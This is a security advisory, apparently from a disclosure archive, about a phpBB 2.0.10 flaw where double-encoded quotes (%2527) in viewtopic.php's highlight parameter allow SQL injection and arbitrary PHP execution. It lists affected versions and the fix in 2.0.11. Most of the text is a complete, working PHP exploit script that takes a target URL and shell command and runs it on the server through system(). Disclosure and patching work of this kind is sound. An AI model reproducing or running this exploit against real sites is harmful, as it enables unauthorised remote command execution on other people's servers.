|
|
|
|
| |
| "phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package". Inadequate UTF-8 character escaping cause arbitrary command execution vulnerability in phpBB. |
| |
Credit:
The information has been provided by jessica soules.
Exploit code by pokleyzz.
|
| |
Vulnerable Systems:
* phpBB version 2.0.10 and prior
* The issue may affect PNphpbb and other products based on phpBB.
Immune Systems:
* phpBB Version 2.0.11
Because of the way urldecode and magic quotes works, it turns %2527 into %27, which is a single quote, and it leaves it unslashed. This gives you a SQL Injection, leading to arbitrary PHP exec hole.
Example:
http://www.example.com/viewtopic.php?t=1&highlight=%2527
Will result in the following error message:
Parse error: parse error, unexpected T_STRING in viewtopic.php(1109) : regexp code on line 1
Fatal error: Failed evaluating code: preg_replace('#\b(')\b#i', '\1', '>POST TEXT HERE<') in viewtopic.php on line 1109
Vendor Status:
The issue has been fixed in phpBB version 2.0.11 and newer.
Temporary fix:
A temporary fix can be found at: http://www.phpbb.com/phpBB/viewtopic.php?t=240513
Exploit Code:
#!/usr/bin/php -q
<?php
/*
# phpBB 2.0.10 execute command by pokleyzz <pokleyzz at scan-associates.net>
# 15th November 2004 : 4:04 a.m
#
# bug found by How Dark (http://www.howdark.com) (1st October 2004)
#
# Requirement:
#
# PHP 4.x with curl extension;
#
# ** Selamat Hari Raya **
*/
if (!(function_exists('curl_init'))) {
echo "cURL extension required\n";
exit;
}
if ($argv[2]){
$url = $argv[1];
$command = $argv[2];
}
else {
echo "Usage: ".$argv[0]." <URL> <command> [topic id] [proxy]\n\n";
echo "\tURL\t URL to phpnBB site (ex: http://127.0.0.1/html)\n";
echo "\tcommand\t command to execute on server (ex: 'ls -la')\n";
echo "\ttopic_id\t topic id\n";
echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n";
exit;
}
if ($argv[3])
$topic = $argv[3];
else
$topic = 1;
if ($argv[4])
$proxy = $argv[4];
$cmd = str2chr($command);
$action = "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd." )%252e%2527";
$ch=curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
echo $res;
function str2chr($str){
for($i = 0;$i < strlen($str);$i++){
$chr .= "chr(".ord($str{$i}).")";
if ($i != strlen($str) -1)
$chr .= "%252e";
}
return $chr;
}
?>
|
|
|
|
|
|
|
|
|
|
